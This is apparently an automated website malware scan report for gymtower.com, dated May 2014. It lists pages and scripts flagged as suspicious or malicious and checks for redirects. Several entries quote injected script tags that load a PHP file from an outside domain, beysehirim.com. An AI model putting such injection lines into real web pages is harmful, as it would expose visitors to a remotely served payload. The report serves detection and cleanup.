Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gymtower.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gymtower.com/ | 200 OK Content-Length: 1529 Content-Type: text/html | suspicious |
Suspicious code found (script loaded from an external domain, beysehirim.com, rather than from gymtower.com itself): <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464202"></script> | ||
http://gymtower.com/home.php | 200 OK Content-Length: 4307 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: text/javascript | clean |
http://gymtower.com/js/jquery.jscrollpane.min.js | 200 OK Content-Length: 20348 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b,a,c){b.fn.jScrollPane=function(f){function d(E,P){var aA,R=this,Z,al,w,an,U,aa,z,r,aB,aG,aw,j,J,i,k,ab,V,ar,Y,u,B,at,ag,ao,H,m,av,az,y,ax,aJ,g,M,ak=true,Q=true,aI=false,l=false,aq=E.clone(false,false).empty(),ad=b.fn.mwheelIntent?"mwheelIntent.jsp":"mousewheel.jsp";aJ=E.css("paddingTop")+" "+E.css("paddingRight")+" "+E.css("paddingBottom")+" "+E.css("paddingLeft");g=(parseInt(E.css("paddingLeft"),10)||0)+(parseInt(E.css("paddingRight"),10)||0);function au(aS){var aN,aP,aO,aL,aK,aR,aQ [excerpt truncated; what is shown reads as ordinary jScrollPane plugin code, so the portion the antivirus engines flagged is presumably further into the file — compare the served file against a known-good copy of the library to locate it] Antivirus reports:
| ||
http://gymtower.com/js/jquery.mousewheel.js | 200 OK Content-Length: 7964 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var types = ['DOMMouseScroll', 'mousewheel']; $.event.special.mousewheel = { setup: function() { if ( this.addEventListener ) { for ( var i=types.length; i; ) { this.addEventListener( types[--i], handler, false ); } } else { this.onmousewheel = handler; } }, teardown: function() { if ( this.removeEventListener ) { Antivirus reports:
| ||
http://gymtower.com/js/jquery.nyroModal.custom.js | 200 OK Content-Length: 64072 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(function($, undefined) { var $w = $(window), $d = $(document), $b = $('body'), baseHref = $('base').attr('href'), _nmObj = { filters: [], callbacks: {}, loadFilter: undefined, modal: false, closeOnEscape: true, closeOnClick: true, useKeyHandler: false, showCloseButton: true, closeButton: '<a href="#" class="nyroModalClose nyroModalCloseButton nmReposition" title="close">Close</a>', stack: false, Antivirus reports:
| ||
http://gymtower.com/js/commonFunctions.js | 200 OK Content-Length: 6340 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function(){ $('.scroll-pane').jScrollPane({ horizontalGutter: 30 }); $('a.actividades').nyroModal({ callbacks: { afterShowCont: function(){ $('#actividades-cont .scroll-pane').jScrollPane({ horizontalGutter: 30 }); $("ul").each(function(){ $(this).children("li:last").addClass("last"); }); } } }); $("#nav li" Antivirus reports:
| ||
http://gymtower.com/index.php | 200 OK Content-Length: 1529 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464202"></script> | ||
http://gymtower.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://gymtower.com/empresa.php | 200 OK Content-Length: 5141 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://gymtower.com/serv-personalizado.php | 200 OK Content-Length: 6169 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://gymtower.com/serv-empresas.php | 200 OK Content-Length: 6986 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://gymtower.com/serv-tower.php | 200 OK Content-Length: 4993 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://beysehirim.com/thrzkffj.php?id=46464204"></script> | ||
http://gymtower.com/contacto.php | 200 OK Content-Length: 6223 Content-Type: text/html | clean |
http://gymtower.com/js/validacion.js | 200 OK Content-Length: 7916 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Validacion={ form:null, patronMail:/^[_a-zA-Z0-9-]+(\.[_a-zA-Z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/, inicio:function(){ this.form=document.getElementById('contactForm'); }, validarForm:function(){ var campos=new Array(); campos[0]='nombre'; campos[1]='empresa'; campos[2]='pais'; campos[3]='email'; campos[4]='mensaje'; var idCampo=null; var error=false; var regExpr=false; for(i=0;i<campos. Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gymtower.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 May 2014 21:56:01 GMT
Via: 1.1 varnish
Age: 0
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie2: WS_Tracker=e2533188.4fa2c697769e9; path=/
X-Cache: MISS
X-Varnish: 2068534305
GET / HTTP/1.1
Host: gymtower.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 May 2014 21:56:01 GMT
Via: 1.1 varnish
Age: 0
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie2: WS_Tracker=e2533188.4fa2c697769e9; path=/
X-Cache: MISS
X-Varnish: 2068534305
Second query (visit from search engine):
GET / HTTP/1.1
Host: gymtower.com
Referer: http://www.google.com/search?q=gymtower.com
Result:
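The result is similar to the first query. There are no suspicious redirects found. Only a direct visit and a visit with a Google search Referer were compared, so this result covers referrer-based redirects only and does not contradict the injected script tags reported under "Scanned pages/files".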
GET / HTTP/1.1
Host: gymtower.com
Referer: http://www.google.com/search?q=gymtower.com
Result:
The result is similar to the first query. There are no suspicious redirects found.